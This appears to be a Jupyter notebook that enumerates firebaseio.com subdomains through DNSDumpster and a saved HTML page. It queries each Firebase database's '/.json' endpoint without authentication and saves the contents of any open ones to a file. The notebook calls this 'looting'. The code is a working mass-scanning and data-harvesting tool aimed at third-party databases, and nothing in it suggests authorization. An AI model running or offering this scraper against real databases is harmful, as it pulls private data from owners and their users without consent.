In [1]:
from dnsdumpster.DNSDumpsterAPI import DNSDumpsterAPI

print('Gathering subdomains using DNSDumpster...')
results = DNSDumpsterAPI().search('firebaseio.com')
domains = [domain['domain'] for domain in results['dns_records']['host']]

Gathering subdomains using DNSDumpster...


In [2]:
from bs4 import BeautifulSoup

print('Gathering subdomains through the downloaded file...')
with open('subdomains.html', 'r') as f:
    s = BeautifulSoup(f.read(), 'html.parser')
    
table = s.find('div', class_='col-xs-12').find('table')
domains.extend([row.find('a')['href'] for row in table.find('tbody').find_all('tr')[:-1]])

Gathering subdomains through the downloaded file...


In [15]:
import requests

def clean(domain):
    if domain.count('http://') == 0:
        url = ('https://{}/.json').format(domain)
    else:
        domain = domain.replace('http', 'https')
        url = ('{}.json').format(domain)
    return url

def work(url):
    r = requests.get(url).json()
    if 'error' in r.keys():
        if r['error'] == 'Permission denied':
            return {'status':-1, 'url':url}
        else:
            return {'status':0, 'url':url, 'data':r}
    else:
        return {'status':1, 'url':url, 'data':r}

In [16]:
print('Cleaning and looting!')
urls = map(clean, domains)
loot = list(map(work, urls))

Cleaning and looting!


In [17]:
import json

print('Saving results to results.json')
with open('results.json', 'w') as f:
    json.dump(loot, f)

Saving results to results.json


In [36]:
l = {'1':0, '0':0, '-1':0}

for result in loot:
    l[str(result['status'])] +=1

print('Secure databases found:              {}'.format(l['-1']))
print('Possible vulnerable databases found: {}'.format(l['0']))
print('Vulnerable databases found:          {}'.format(l['1']))

Secure databases found:              10
Possible vulnerable databases found: 10
Vulnerable databases found:          10
